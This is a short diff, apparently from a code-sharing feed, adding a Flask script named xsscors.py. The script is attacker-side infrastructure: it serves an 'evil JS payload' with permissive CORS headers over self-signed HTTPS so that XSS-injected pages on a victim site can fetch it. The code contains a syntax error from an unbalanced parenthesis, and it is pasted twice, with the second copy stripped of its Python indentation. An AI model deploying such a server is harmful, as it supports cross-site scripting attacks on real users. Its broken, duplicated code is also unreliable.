queencitycyber · April 25, 2022 15:31
diff --git a/xsscors.py b/xsscors.py
 """
 A tiny Flask web server ready to shoot reflective CORS Access-Control-Allow-Origin headers to accept connections from an XSS affected victim while hosting your evil JS payload
 """
 # Stolen from https://twitter.com/snovvcrash/status/1511702029403631620

 from flask import Flask, send_file
 from flask_cors import CORS

 app = Flask(__name__)
 CORS(app)

 @app.route('/xss.js', methods=['GET'])
 def xss():
  return send_file('./xss.js'), download_name='xss.js')

 # openssl req -x509 -newkey rsa:4096 -nodes -out cert.pem -keyout key.pem -days 365
 app.run(host='0.0.0.0', port=443, ssl_context=('cert.pem', 'key.pem'))
	"""
	A tiny Flask web server ready to shoot reflective CORS Access-Control-Allow-Origin headers to accept connections from an XSS affected victim while hosting your evil JS payload
	"""
	# Stolen from https://twitter.com/snovvcrash/status/1511702029403631620

	from flask import Flask, send_file
	from flask_cors import CORS

	app = Flask(__name__)
	CORS(app)

	@app.route('/xss.js', methods=['GET'])
	def xss():
	return send_file('./xss.js'), download_name='xss.js')

	# openssl req -x509 -newkey rsa:4096 -nodes -out cert.pem -keyout key.pem -days 365
	app.run(host='0.0.0.0', port=443, ssl_context=('cert.pem', 'key.pem'))